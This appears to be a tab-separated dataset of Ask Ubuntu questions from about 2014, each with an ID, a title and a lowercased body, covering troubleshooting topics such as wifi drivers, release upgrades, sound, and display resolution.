512944	juju error : certificate expired/not-valid	on ubuntu 14.04 , i 'm seeing below errors in juju machine log after deploying a juju charm for nova-compute : 2014-08-18 06:50:42 error juju apiclient.go:119 state/api : websocket.dial wss : //bootstrap.maas:17070/ : x509 : certificate has expired or is not yet valid 2014-08-18 06:50:42 error juju runner.go:220 worker : exited `` api '' : websocket.dial wss : //bootstrap.maas:17070/ : x509 : certificate has expired or is not yet valid how can i fix this error ? juju version : 1.18.1-0ubuntu1
512946	how do i remove ubuntu completely and install windows 7 ?	i have installed ubuntu 14.04 lts on my computer . i completely deleted my windows 7 ( which i had previously installed ) . now i have changed my mind and i wish to install windows 7 again and i am having some problems which i do not have any idea how to fix . i am a total beginner when it comes to handling ubuntu and linux , i know absolutely nothing , so please when explaining what i should do , do so carefully . i have my win 7 64-bit dvd which is bootable and i have tried booting it on other machines and it worked perfectly , so the disc is good to go . when i put it in my machine and restart the computer , i keep pressing f12 to go to the boot menu . when i get there , there is only one option to pick , which is the cd/dvd reader in which my disc is located at . when i press enter , i get a message similar to the following : `` disc is not bootable , press enter to go back '' . this is really annoying and i really do not have any idea what to do . please help me as soon as possible .
512949	ubuntu 14.04 does n't see ipad anymore	a month ago i had the trust/do n't trust bug , so i search for a solution . i found libimobiledevice . i installed it and everything works fine : ubuntu could see my ipad and show it up in nautilus . since then i 've never plugged in my ipad to my pc again until today , to find out that ubuntu does n't see my ipad anymore ! when plugged the ipad starts charging , but it does n't show up in nautilus.. any ideas to fix this ? thank you !
512951	problem with dell poweredge 1950 network interface	the 1950 has two broadcom corporation netxtreme ii bcm5708 gigabit ethernet interfaces . when i have eth0 running and eth1 disabled , dhcp client kicks in , and the server is assigned an address and life is good . when i activate eth1 , it changes the route to that interfaces ip info . although eth1 is able to be assigned an address , once the address is assigned , i am not able to connect to the network . with eth0 running and eth1 off , it looks like this : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.5.1 0.0.0.0 ug 0 0 0 eth0 192.168.5.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 as soon as i turn on eth1 it change to the following : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.140.1 0.0.0.0 ug 0 0 0 eth1 192.168.5.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 192.168.140.0 0.0.0.0 255.255.255.0 u 1 0 0 eth1 what do i need to do so that eth0 maintains the default gateway with eth1 being secondary ?
512954	issues with xmodmap , alt+shift or alt+control viewed as hyper ?	i have a file , .xmodmap , that looks like this : clear control clear mod4 clear mod1 keycode 64 = control_l keycode 37 = control_l keycode 133 = alt_l keycode 108 = super_r keycode 134 = alt_r add mod1 = super_r add mod4 = alt_l alt_r add control = control_l control_r remove lock = caps_lock keysym escape = caps_lock keysym caps_lock = escape add lock = caps_lock it works fine when only one modifier is pressed at a time , but messes up when multiple modifiers are pressed . specifically , i 'm trying to get the commands to switch a window to another workspace to work . i want the key-combination to be shift-alt-control-j for down , shift-alt-control-k for up , etc . however , when i go into compizconfig settings manager and press the 'grab key combination ' button , and then hold alt-shift or alt-control , it shows hyper-shift , or hyper-control . the key combination does not work after that . for example , i go to compizconfig settings manager , click on the desktop wall icon , go to the 'move window within wall ' option under the 'bindings ' tab . i then click on the current key-combination for 'move left with window ' , and then click on 'grab key combination ' . i enter the key combination i 'd like ( shift-control-alt-h ) , and it 's registered as control-shift-hyper-h .
512955	how to install on lenovo ideapad flex 15d	i would like to know how to instsll install ubuntu 14.04 on my lenovo ideapad flex 15 d that have windows 8 based on uefi firmwares and have hidden partitions for recovery , so i saw a lot of youtube videos about uefi but no one of guides are worked my cpu is amd a4 5000 the strange is it has the support for hyper-v and virtualization is disabled and no features in bios to activate it , so any one can give me a solution i am an android developers i need ubuntu..thanks
512960	no sound with gigabyte g1.sniper z97 mainboard	i 'm a linux beginner and installed ubuntu 14.04 but i have sound issues . i 've got onboard sound and my motherboard is called gigabyte g1.sniper z97 . i already tried to fix the problem with google but as a linux beginner i 've got to my limits . here is the output of some things you might need : cat /proc/asound/cards 0 [ hdmi ] : hda-intel - hda intel hdmi hda intel hdmi at 0xf7a14000 irq 52 1 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf7a10000 irq 49 2 [ nvidia ] : hda-intel - hda nvidia hda nvidia at 0xf7080000 irq 17 aplay /usr/share/sounds/alsa/front_center.wav wiedergabe : wave '/usr/share/sounds/alsa/front_center.wav ' : signed 16 bit little endian , rate : 48000 hz , mono i also tried to reload alsa and to reinstall it but i still got no sound . i even reinstalled ubuntu but i didnt get any progress with my problem . i hope you guys have an idea .
512961	exclude certain files in ls	i would like to run ls and exclude certain files in the output . when i run the following command , i get all files with each on one line : $ ls -1 file1 file2 file3 temp i would like to run this command in a way so it shows $ ls -1 < insert magic here > temp file1 file2 file3
512962	sweet home 3d does n't start	i have been using ubuntu 13.10 32-bit . i recently installed sweet home 3d from software center . but it does n't start after installation even after restarting the system . trying to start it from terminal gives the following message . neo @ neo-oem : ~ $ sweethome3d [ warning ] /usr/bin/sweethome3d : unable to locate /usr/lib/jvm/java-6-sun/jre/lib/javaws.jar in /usr/share/java java 3d : implicit antialiasing enabled ^cneo @ neo-oem : ~ $ ^c i tried to search java-6-sun in software center but could not find it . can anyone help me ?
512964	nemo keyboard shortcuts overwritten	i read a lot about how you can make nemo your standard file browser in ubuntu 14.04 . i managed to install it and most of the standard actions are performed by nemo and no longer by nautilus - as it should be . but there is one thing i can not manage to do : i can not make nemo to accept my keyboard shortcuts , which i declared in ~/.gnome2/accels/nemo . it seems like this file gets overwritten when i restart nemo . what i want to achieve is that i can open a terminal in the currently openend directory . what i tried was editing the line ; ( gtk_accel_path `` < actions > /dirviewactions/openinterminal '' `` < primary > < alt > z '' ) in the file ~/.gnome2/accels/nemo . however , any changes are lost after the next start of nemo . thanks a lot ! edit : i am stupid . if you remove the ; in front of the line ; ( gtk_accel_path `` < actions > /dirviewactions/openinterminal '' `` < primary > < alt > z '' ) everything works . sorry for the foolish question .
512966	64 v amd64 distribution	this must have been asked many times , but for some reason it 's not clear from about ten mins looking into it why is there a separate 64bit and amd64 ? does this mean 32 bit code wo n't run on the 64bit , but on ; y on amd64 ? or simply that intel and amd have diverged and 64 is intel optimized , amd is amd optimised ?
512967	how to launch specific webbrowser for specific urls ?	i would like to launch firefox for urls with website `` firefoxexampledotcom/ ... '' and chromium with urls containing `` chromiumexampledotcom/ ... '' to make it less complex in the beginning : for my own need it would be ok to open all links in firefox , but the links for one domain `` example.com/ ... '' in chromium . is that possible ? more generally speaking : can i create a table somehere that assigns n domains to browser a , m domains to browser b , and o domains to browser c ... i hope you can understand what i mean . if not , please ask again !
512970	how can i get a new account password using superx	okay i am using superx which is an os based on kde i am not sure if i can get much help here but lets give it a try . i am trying to install a new os onto my computer , but it wont allow me to install any new stuff because it says i need a password i do n't remember putting a password onto the computer so i cant do any installations . so basically i did some google searching looking for a way to reset the password it would n't let me . i am not sure if i gave enough info but any help would be appreciated ... ( more info ) when i attempt to `` drop to root shell prompt '' it gives me this `` give root password fr maintenance ( or type control -d to continue ) '' i dont know the root password . i tried installing ubuntu using a memory stick but it wont open any files .
512972	libssl-dev and libssl1.0.0 on confilcting versions	my problem on 12.04lts is that somehow my libssl1.0.0 got upgraded to 1.0.1-4ubuntu5.17 and my libssl-dev requires 1.0.1-4ubuntu5.14 apt wo n't update libssl-dev because libssl1.0.0 was upgraded first . xxx @ xxx : ~/debian $ sudo apt-get install libssl-dev reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : libtommath0 use 'apt-get autoremove ' to remove them . the following packages will be upgraded : libssl-dev 1 upgraded , 0 newly installed , 0 to remove and 123 not upgraded . 1 not fully installed or removed . need to get 0 b/1,574 kb of archives . after this operation , 1,024 b of additional disk space will be used . dpkg : dependency problems prevent configuration of libssl-dev : libssl-dev depends on libssl1.0.0 ( = 1.0.1-4ubuntu5.14 ) ; however : version of libssl1.0.0 on system is 1.0.1-4ubuntu5.17 . dpkg : error processing libssl-dev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : libssl-dev also tried downgrading libssl1.0.0 but got version not found . xxx @ xxx : ~/debian $ sudo apt-get install libssl1.0.0=1.0.1-4ubuntu5.14 reading package lists ... done building dependency tree reading state information ... done e : version '1.0.1-4ubuntu5.14 ' for 'libssl1.0.0 ' was not found any help would be greatly appreciated .
512973	blue screen while running ubuntu on vmware in windows 7	i have got dell inspiron 3521 laptop with windows 7 32 bit,4 gb ram , i3 . i was trying to run ubuntu on vmware . it was installed successfully but when i tried to run it then blue screen appears . please help me to get rid of this problem
512975	the kernel use which scheduling algorithm ?	i know there are a lot of scheduling algorithm for processor . like fcfs ( first come first served ) or sjf ( short job first ) and so on . how to know the kernel using which algorithm ?
512976	can not upgrade from 12.04lts to 14.04	i have been trying to upgrade to 14.04 for several days now , but every time i get this error message : w : failed to fetch gzip : /var/lib/apt/lists/partial/security.ubuntu.com_ubuntu_dists_trusty-security_universe_i18n_translation-en encountered a section with no package : header , e : some index files failed to download . they have been ignored , or old ones used instead .
512977	dell b1160w not working in 14.04	i originally installed the dell b1160w printer on ubuntu 12.04 . it worked as expected . a few months ago i upgraded to ubuntu 14.04 64 bit and now i ca n't get the printer to work . i looked at the driver information on the dell site . they have not updated their driver since 2013 so 12.04 is the latest version with a supported driver . is there a work around for this problem , like a generic driver that i can use or a way to install whatever printer interface ubuntu 12.04 was using ? i have a windows virtual box . i can get it to work through there , but it 's inconvenient to pull up my virtual box and transfer the files over to it anytime i want to print .
512978	dvd drive burner not working	i 'm attempting to burn bodhi linux to a blank dvd . it 's a dual-layered dvd+r dl disc and my drive has burned to these discs before . i know bodhi will fit on a regular dvd or a cd but all i have at the moment is the dual layered dvds . the computer i 'm putting bodhi on does n't support booting from usb either . when i try to write the bodhi iso to the dvd with xfburn , i get this error : http : //i.stack.imgur.com/lxs0o.png i was able to burn to these exact dvds about a week ago , preparing a video compilation using devede and xfburn . using k3bm , i get an error saying `` failed to write '' and when using brasero ( as a last attempt ) i received the same error as with xfburn .
512979	how to install broadcom wifi driver	i am not an expert in linux but i have a computer witch i installed lubuntu on it and i have to install broadcom wifi driver to connect it to internet but i have no idea to do that so help please and thanks for advance
512980	can i upgrade my ubuntu version and change to be primary os after originally installing with wibu ?	i have recently installed ubuntu 12.04 using wubi 12.04 and i now wish to upgrade to a full installation of ubuntu 14.04 , before attempting to upgrade through the update center i did some research on upgrading from a wubi installation ( alongside windows ) to a full installation making ubuntu primary and only os and found that it is in fact doable through the update center however it is just highly recommended to perform a full backup before doing so . i have now finished backing up all the data i need to worry about and began the upgrade process through the update center and received the following error : your graphics hardware may not be fully supported in ubuntu 14.04 . running the 'unity ' desktop environment is not fully supported by your graphics hardware . you will maybe end up in a very slow environment after the upgrade . our advice is to keep the lts version for now . for more information see https : //wiki.ubuntu.com/x/bugs/updatemanagerwarningforunity3d do you still want to continue with the upgrade ? my questions are as follows : a. isnt 14.04 a lts version ? ? ? b , what are your recomendations in order to ensure my graphics driver is installed correctly and im not stuck with bad configs/install ?
512985	my ide keeps crashing instantly : how do i diagnose ?	i am using aptana , java-based ide . starting today , it is crashing suddenly every few minutes . this may have to do with the fact that i recently upgraded to xubuntu 14.04 . there is no error message . it just disappears instantly . how can i diagnose this given that there is no error message ?
512987	how to change input language	i want to have the ability to switch between my input languages , but i cant drag and drop the languages in language support , because the languages seem to be greyed out , what should i do ? !
512989	new laptop with atheros ar956x wireless adapter wont work on ubuntu 14.00	i bought a new laptop asus x451ma , it has ar956x wireless adapter the thing is is not working i had to attach a usb wifi adapter and it worked fine , i need some help guys getting the drivers for that adapter , thank you .
512990	ubuntu/xubuntu install crashes when trying to add partition [ solved ]	it was a problem with the specific hard drive i was using . i put in a another one and it works perfectly fine . i just got a new hard drive and i want to put linux on it , but i cant install it due to the above problem . i 've even tried making a new partition in gparted , but it does n't show when trying to install . if i click on the plus , minus , or change buttons , the installer crashes . in ubuntu it freezes for about 30 seconds , and in xubuntu it crashes right away . when type `` sudo fdisk -l '' in the console this is the output : '' disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x47531277 device boot start end blocks id system /dev/sda1 123877376 1936748543 906435584 83 linux disk /dev/sdb : 16.0 gb , 16039018496 bytes 64 heads , 32 sectors/track , 15296 cylinders , total 31326208 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00094134 device boot start end blocks id system /dev/sdb1 * 32 31326207 15663088 c w95 fat32 ( lba ) '' this is what it looks like in gparted
512993	english only layout for password	i have couple keyboard layouts installed . using ru for very limited range of tasks . but almost every time my pc wakes up from hibernate current layout is ru ( and sometimes it gets stuck , and it 's impossible to change it back ) can i force keyboard layout for password fields ( system-wide ) to english ?
512994	nautilus-action conf . tool - crafting a `` set as background '' action	i wanted to create an option in the context menu to set the clicked picture to current desktop background ( just like in windows ) . i read the the nautilus action help but i could n't figure it out . this is by far the command i could craft : gsettings set org.gnome.desktop.background picture-uri file : // $ pwd/ what i need : a command that correctly sets the current image to be the desktop background this command should only appear to the proper files ( picture extenstions like .jpg ) edit : after v2r answer and this comment , i would like to put more details . i basically want to refer to `` current directory path '' and `` current file clicked '' . for `` current directory path '' i used $ pwd ( is this the right way ? ) . i do n't know what to use for `` current file clicked '' but it would be certainly after the path ( e.g . $ pwd/pic_name.jpg ) . the condition of associating this action with pictures ( e.g .jpg/.png ) is not important now , but i am sure it can be done from nautilus-action .
512996	not quite multiseat	i am attempting to create a pair programming environment sort of set up like multiseat : https : //help.ubuntu.com/community/multiseatx [ 1 ] or https : //help.ubuntu.com/community/multiseatonecard [ 2 ] ( as the standard issue boxes only have one graphics card ) the thing is , i only want one login session , just with 2 monitors , keyboards , and mice . as well as having 2 active applications ( so 2 people can be typing independantly ) . they should ideally be able to mouse over and click & type in the other persons monitor , as well as move windows between the montors . does anybody know of anything like this that will work ? we are running ubuntu 12.04 .
512998	installing ubuntu 14.04 lts stuck on 'configuring bcmwl-kernel-source ( i386 ) '	i 'm trying to install ubuntu 14.04 lts on my hp pavilion dv5000 , but it 's stuck during the installation on 'configuring bcmwl-kernel-source ( i386 ) ' . where is the problem ? how to fix it ? i tried several times to install it but it does n't help . please help me .
513000	how to get hdmi sound devices inside lxc ?	i created lxc container in 12.04.3 server and installed gnome display manager to it . now gdm works well , but i do n't have hdmi sound . ubuntu @ quintilis : ~ $ aplay -l aplay : device_list:252 : no soundcards found ... ubuntu @ quintilis : ~ $ sudo aplay -l aplay : device_list:252 : no soundcards found ...
513001	trouble upgrading from 12.04 to 14.04.1 lts	after running these commands from the command line : sudo apt-get update sudo apt-get dist-upgrade sudo do-release-upgrade -d i get the following error message : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/main/source/sources 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . how can i fix this bug ?
513004	telephone call answering machine software	i have been looking for a telephone call answering machine program for linux , but i have n't had much luck . in windows , i have used callstation for many years . you can find out more about it at http : //imptec.com/callstation.htm and be sure to click the features and screenshots buttons at the top of this link as well for more information . i am looking for a linux equivalent of callstation where calls can be answered or hung-up on , faxes can be received , caller id is shown , calls can be recorded in their entirety , etc . is there anything like this for linux ? in fact now in windows ( i believe this started with either windows xp or vista ) calls and recordings can only be recorded for like 55 seconds . i have heard it is because microsoft changed something with windows ' voice modem support . i am hoping linux does not suffer from this .
513010	icedtea webstart applications have a taskbar	i get a taskbar on icedtea webstart applications like below . it is there whether there are any dialogs open or not ( shown with a dialog just to help identify what it is ) and it covers the bottom portion of fixed size windows , which means it usually covers something useful ( as in the example below ) . this does n't happen with java on windows . i have not yet tried the official oracle java on linux but i 'd rather not if this can be fixed with icedtea .
513011	wireless drivers for broadcom bcm 4321 ( 14e4:4329 ) will not stay connected to a wireless network	so , i 'm not necessary new to linux , i just never took the time to learn it , so please , bare with me . i just swapped out one of my wireless cards from one computer to another . this wireless card in question would be a `` broadcom bcm4321 ( 14e4:4329 ) '' or actually a `` netgear wn311b rangemax next 270 mbps wireless pci adapter '' , but that 's not important . i 've tried ( but probably screwed up in the process ) installing the `` wl '' , `` b43 '' and `` brcmsmac '' drivers , or at least i think i did . currently i have only the following drivers loaded : eugene @ eugenes-pcu : ~ $ lsmod | grep `` brcmsmac\|b43\|ssb\|bcma\|wl '' b43 387371 0 bcma 52096 1 b43 mac80211 630653 1 b43 cfg80211 484040 2 b43 , mac80211 ssb_hcd 12869 0 ssb 62379 2 b43 , ssb_hcd the main issue is that with most of the drivers available that i 've installed , they will find my wireless network but , they will only stay connected for about a minute with abnormally slow speed and then all of a sudden disconnect . currently , the computer is hooked into another to share it 's connect so that i can install drivers from the internet instead of loading them on to a flash drive and doing it offline . if anyone has any insight to the problem , that would be awesome . if not , i 'll probably just look up how to install the windows closed source driver . edit 1 : even when i try the method here , as suggested when this was marked as a duplicate , i still ca n't stay connected to a wireless network . edit 2 : after discussing my issue with @ luis , he opened my question back up and told me to include the tests/procedures in the comments . basically i did this : read the first answer of the link above when this question was marked as duplicate which involved installing removing bcmwl-kernel-source and instead install firmware-b43-installer and b43-fwcutter . no change of result and contacted luis in the comments , who then told me to try the second answer which involved removing my previous mistake and installing bcmwl-kernel-source now the network manger ( this has happend before , but usally i fixed it by using a different driver ) even recognizes wifi exist ( both non-literal and literal ) . luis who then suggested sudo rfkill unblock all rfkill unblock all did n't return anything , so i decide to try sudo rfkill list all . returns nothing ( no wonder rfkill unblock all did nothing ) . i enter lsmod | grep `` brcmsmac\|b43\|ssb\|bcma\|wl '' and that returns nothing . try loading the driver by entering sudo modprobe b43 and try lsmod | grep `` brcmsmac\|b43\|ssb\|bcma\|wl '' again . returns this : eugene @ eugenes-upc : ~ $ sudo modprobe b43 eugene @ eugenes-upc : ~ $ lsmod | grep `` brcmsmac\|b43\|ssb\|bcma\|wl '' b43 387371 0 bcma 52096 1 b43 mac80211 630653 1 b43 cfg80211 484040 2 b43 , mac80211 ssb_hcd 12869 0 ssb 62379 2 b43 , ssb_hcd so to recap : currently network manager does n't recognize wireless exists , b43 drivers are loaded and i 've currently hardwired a connect from my laptop to the computer that 's causing this . edit 3 : so i just decided to try again to install bcmwl-kernel-source . it was able to find my network and it tried to connect . however , in never really succeeded and kept asking me for the network pass phrase . i give it the correct one every time but it keeps asking about three times and then stops trying . at this point i 'm starting to research how to use ndiswrapper but have n't had any luck with that either .
513014	ubuntu - nvidia drivers causes weird behaviour	i installed the latest nvidia drivers after many dirty attemps ( i 'm not used to linux and using console to install drivers ) and well , finaly aparently i made it . one thing i noticed is that when i 'm browsing the web , the pictures ( like browsing facebook photos ) appear a lot darker than they looked before installing the drivers . second thing is that part of ui controls of programs , like mozilla , netbeans and others just flicker and it is very uncomfortable because it is very often . i am using ubuntu 14.04 and i want to uninstall the nvidia drivers and use the default ones . how do i do it ?
513015	how to reset unity appearance settings	i was curious . someone said kubuntu is awesome . so i installed it ( sudo apt-get install kubuntu-desktop ) . i did n't like it . keyboard shortcuts that i became familiar with in unity were n't working . it just felt too `` kids r us '' for me , like a toy os , so i logged back into unity and noticed some oddities . all my menus were jacked . the background of menus are now black and the text in the menu is a dark grey so i can barely read my menus . a new square icon has appeared in the top panel with a do-not-enter icon on it . upon clicking it gives me english , character map , keyboard layout , and text entry settings . google chrome 's tabs are now a weird white/grey gradient and my navigation buttons ( back , forward , refresh ) are a bubbly cartoon-ish blue and green . so , i ran sudo apt-get purge kubuntu-desktop & & sudo apt-get autoremove and rebooted . i still have 3 extra `` skin ( ? ) /distros ( ? ) '' available to me at the login screen when i click the ubuntu icon . so looks like not everything got removed . any ideas ? i really hope i do n't have to re-install everything , again . and i learned `` unity -- reset '' has been deprecated : (
513017	ubuntu tweak natural scrolling not persistent	i am using ubuntu tweak on ubuntu 12.04 and the natural scrolling setting does not persist after restart . so is there a way to permanently enable natural scrolling ? if i have left any details out please tell me and i will add them as i am new to this . system details : ubuntu 12.04 processor armv7 memory 2.0 gib unity 2d my ubuntu installation is on a samsung chromebook through crouton .
513020	unable to open the terminal emulator	i recently applied a distribution upgrade on an existing cae linux installation on my computer . ( i.e. , from version 12.04 to 14.04 ) . when i try opening the terminal emulator , the terminal window flashes and exits in a second . i tried installing other terminal softwares but no luck . this issue is exactly the same as in the following post : however , i do n't see any fruitful responses concerning this post . appreciate any help on this issue . thanks !
513021	ubuntu installation on htc salsa	i was trying to install ubuntu for smartphone on htc salsa . in the final step i got the following error . ~ $ sudo ubuntu-device-flash -- channel=devel -- bootstrap 2014/08/18 22:54:19 expecting the device to be in the bootloader ... waiting 2014/08/18 22:54:19 device is |icon_g| 2014/08/18 22:54:19 device icon_g not found on server https : //system-image.ubuntu.com channel devel please guide me . i followed http : //developer.ubuntu.com/start/ubuntu-for-devices/installing-ubuntu-for-devices/
513024	systemd in ubuntu 14.04	i noticed that the most recent update of ubuntu offers to install systemd components . i hesitate to allow this update for i had very nasty experience of doing this in debian-testing when services were n't starting and i had no network . is it possible to keep the current init system ( upstart ? ) and somehow , on a permanet basis , ignore the offer to install systemd ?
513027	flash for ubuntu arm ?	how would i get flash to work on ubuntu 12.04 on an armv7 processor chromebook ? if there is no direct method then would it be possible for me to some how use the chromebooks built in flash player on ubuntu ? i have already tried going to adobes site but they do not offer arm support and i ca n't find google chrome for arm either so i have to use chromium which lacks the flash plugin .
513030	restricted access on gsm-modem usbx for at commands needed	i need help to prevent unwanted access for a gsm-modem on tty serial ( usb0,1,2 ) by either : allow access ( even for at-commands ) only for two programms , both are root ( asterisk and smstools ) or get rid of all attempts by ubuntu ( i.g . network-manager ) to access the device after establishing the connection thanks for all suggestions . additional information : asterisk ( usb1/2 ) and smstools ( usb0 ) work well together on one gsm-modem , but ubuntu seams to send an at-command ( i guess ) on ttyusb0 with causes an unexpected ok on asterisk and a disconnect on smstools at very rare occasions . explanation : i am using chan_dongle and yes , this combination sounds ( and is ) odd , but is the only way to prevent id-spoofing in my case . like i sad , the programms work well together .
513032	how to make apport automatically submit crash information ?	something crashes , i get a popup asking me to submit crash information . i want to do this automatically .
513036	how do you change display resolution in kde plasma 5 ?	i installed the project neon ppa in ubuntu 14.04 to check out the new kde in a vm . i ca n't seem to figure out how to change the display resolution . its stuck at 800x600 . edit : i 'm using vmware player 6.0.3 with vmware tools installed . the unity desktop session runs at 1440x900 . if i log out and switch to plasma5 session , its stuck at 800x600 .
513037	excessive power consumption by ethernet socket	recently i have been having problems with power consumption in ubuntu , i am not exactly sure when this started but roughly about two weeks ago . idle my laptop used about 9-10w of power , or at least it has done for the past two years . recently it uses 16-18w and i have been trying to find out why . using powertop it seems that my network interface is using 10w+ constantly even when not in use i.e . cable disconnected . i have even seen it go as high as 30w for network interface : eth0 ( r8169 ) . which seems like maybe a fault with powertop but my power usage reported elsewhere rises by the same amount . i am not an expert but this seems queer . is this normal and just something that i have n't noticed before ? it seems odd that wifi uses barely any power but ethernet uses a staggering amount , typically about 9-10w making my power usage roughly double what it was . things i have tried : using another driver for my network card - this seemed to drop power to around 5-7w mainly on the upper end of that but i did n't really use it long enough to test properly used an older kernel - no effect whatsoever . is there a way to correct this behaviour if it is n't normal ? i have added the services that were discovered by zenmap : i have an apache server running and also have a local windows network , unfortunately i do n't see anything untoward . -- -edit -- - i have just disabled networking via network manager and in powertop the network interface eth0 disappeared from the list , however the discharge rate did not go down by the same amount that eth0 was taking up ( about 9w when networking was disabled ) so it does seem that powertop is misreporting eth0 's power usage . i 've added a screenshot below . even so something is using more power and not appearing in powertop .
513040	how to install firefox aurora from a terminal ?	i want to install firefox aurora in ubuntu 14.04 from the terminal ( i know there are other ways ) but i ca n't . i 've downloaded firefox-33.0a2.ca.linux-i686.tar.bz2 ( linked from the download page ) and extracted it . but i do n't know how to install it from the terminal . there is no readme file . i 've read that i should use the following commands : ./configure make make install it does n't work , it throws me : bash : ./configure : no such file or directory also tried chmod a+x configure neither worked , it throws : chmod : can not access âconfigureâ : no such file or directory i ca n't find anything else about on the net . running ./firefox , as muru suggested , throws : ./firefox : error while loading shared libraries : libstdc++.so.6 : can not open shared object file : no such file or directory and that error is shown for sudo ./firefox as well . this is a 64-bit ubuntu system , and libstdc++6 package is installed at version 4.8.2-19ubuntu1 . purging and reinstalling the package does n't make any difference to the problem . is there something that i 'm missing ? by the way , what about uninstalling it ?
513044	running ie with virtualbox	when trying to run ie11 in virtualbox ( ubuntu 14.04 host ) i get the following : error : vt-x/amd-v hardware acceleration is not available on your system . certain guests ( e.g . os/2 and qnx ) require this feature and will fail to boot without it . doing some research i found out that in order to enable vt-x/amd-v i need to make sure that : 1 . the cpu you 're using actually supports hardware virtualization . 2 . hardware virtualization is enabled in your bios . 3 . lastly that it 's enabled in your vbox configuration . i believe that my hardware supports virtualization since i see 'svm ' in color when running this command : grep -- color vmx /proc/cpuinfo ( based on how do i enable hardware virtualization technology ( vt-x ) for use in virtualbox ? ) . in order to meet # 3 i need to enable it in vbox but the acceleration tab in my vbox is disabled . i did some searching and found this thread : https : //bbs.archlinux.org/viewtopic.php ? pid=1356653 it suggested the following : vboxmanage modifyvm ie11 -- longmode off i did that but it did n't solve my issue . here is the ie11 that i use ( i took it from modern.ie/en-us/virtualization-tools ) thanks !
513046	how to search strings inside files like in windows without search monkey ?	hi i am using a vmware through which i can not connect to internet because of security restrictions . i was wondering if there was a way to search for strings through the terminal but then find which line the string is located within the file .
513052	how to set default screen resolution in kubuntu 14.04	ok , so i found the new screen resolution setting button , thank you , but now i need to know how do you make it stay . every single time i reboot it resets the resolution back to some strange default that is not native to my monitor . also , the most annoying part is when i toggle the screen with my kvm to use on my other computer then when i flip it back the screen has been reset back to that same strange default setting . so how can i change the screen resolution and make it be the default setting whenever i reboot or toggle my kvm ? i have a amd a10 5800k with hd6670 graphics , dual screen , one is a 1900x1080 , my main monitor which keeps getting reset to 1400x1050 thanks .
513053	wifi hotspot is not working.. [ hard blocked : yes ]	i 'm completely new to ubuntu , i have ubuntu 14.04 installed . i am unable to turn on the wireless key in the network panel . whenever i try rfkill unblock all and rfkill list all then it shows - > soft blocked : no hard blocked : yes even if i try to press fn f12 ( wireless key in my laptop ) the soft block changes but noting happens to the hard blocked ! i use a hp-envy ultrabook model : 1104tx . please help me out here , i have tried every possible solution that i am aware of .
513057	ubuntu boots to grub terminal	i have a dual boot laptop with ubuntu 14.04 and windows xp . i normally use ubuntu , and i had n't gone to windows in a long time , so i wanted to test it . after i was done , i restarted the laptop to get to ubuntu . when i selected it in the menu where you choose you 're os , it went to a terminal thing that said `` grub '' and some instructions . i have no idea how to get to my desktop so that i can do things , so is there any command i can use ? sorry that i 'm a bit bad at using linux : )
513061	run virtualbox in other x session	i 'm running ubuntu on my laptop ( host ) . inside ubuntu , there is running one instance of virtualbox . ( where is installed ms windows ) . my idea is to run virtualbox in separate x session ( something like multiuser ) . if it is not clear , i 'll try to explain ... when i want to visit tty1 , i 'll press ctrl+alt+f1 . to return to my unity desktop , i 'm gona use ctrl+alt+f7 ... and here comes what i need . after pressing ctrl+alt+f8 show fullscreen virtualbox windows system , just to switch as ttys.. i am using ubuntu 14.10 . i have wasted hours by using google to find some solution , but my biggest prolem is i can not name the problem .
513064	what causes the 'failed to start session ' error on ubuntu 14.04 ?	yesterday when i turned on my home laptop i got the 'failed to start session ' error and could not log in . i was only able to fix this today , searching for a solution at the office . i was effectively locked out of my laptop for more than 24 hours ; in over 5 years of ubuntu this was the most serious situation i experienced . the original question here at askubuntu refers to a failed upgrade , but i ran into this problem months after upgrading to 14.04 . there were no relevant package upgrades in the previous session to justify such a failure . what is exactly causing this problem ? and how can i avoid running into it again in the future ? update : some forensic data : a new kernel image was installed on the 15th ( linux-image-extra-3.13.0-34 ) , but i was able to log on and work normally on the following day . it was on the 17th that the session started to failed , so whatever caused this problem happened on the 16th . here 's the ă ptdaemon log from that day : start-date : 2014-08-16 08:54:23 commandline : aptdaemon role='role-commit-packages ' sender=':1.100' upgrade : subversion : amd64 ( 1.8.8-1ubuntu3 , 1.8.8-1ubuntu3.1 ) , libnepomukcleaner4 : amd64 ( 4.13.2-0ubuntu0.1 , 4.13.3-0ubuntu0.1 ) , libsystemd-login0 : amd64 ( 204-5ubuntu20.3 , 204-5ubuntu20.4 ) , systemd-services : amd64 ( 204-5ubuntu20.3 , 204-5ubuntu20.4 ) , libbalooxapian4 : amd64 ( 4.13.2-0ubuntu0.1 , 4.13.3-0ubuntu0.1 ) , nepomuk-core-data : amd64 ( 4.13.2-0ubuntu0.1 , 4.13.3-0ubuntu0.1 ) , libsystemd-daemon0 : amd64 ( 204-5ubuntu20.3 , 204-5ubuntu20.4 ) , libgudev-1.0-0 : amd64 ( 204-5ubuntu20.3 , 204-5ubuntu20.4 ) , libpam-systemd : amd64 ( 204-5ubuntu20.3 , 204-5ubuntu20.4 ) , libsvn1 : amd64 ( 1.8.8-1ubuntu3 , 1.8.8-1ubuntu3.1 ) , udev : amd64 ( 204-5ubuntu20.3 , 204-5ubuntu20.4 ) , gir1.2-gudev-1.0 : amd64 ( 204-5ubuntu20.3 , 204-5ubuntu20.4 ) , libudev1 : amd64 ( 204-5ubuntu20.3 , 204-5ubuntu20.4 ) , libudev1 : i386 ( 204-5ubuntu20.3 , 204-5ubuntu20.4 ) , libbaloofiles4 : amd64 ( 4.13.2-0ubuntu0.1 , 4.13.3-0ubuntu0.1 ) , libsystemd-journal0 : amd64 ( 204-5ubuntu20.3 , 204-5ubuntu20.4 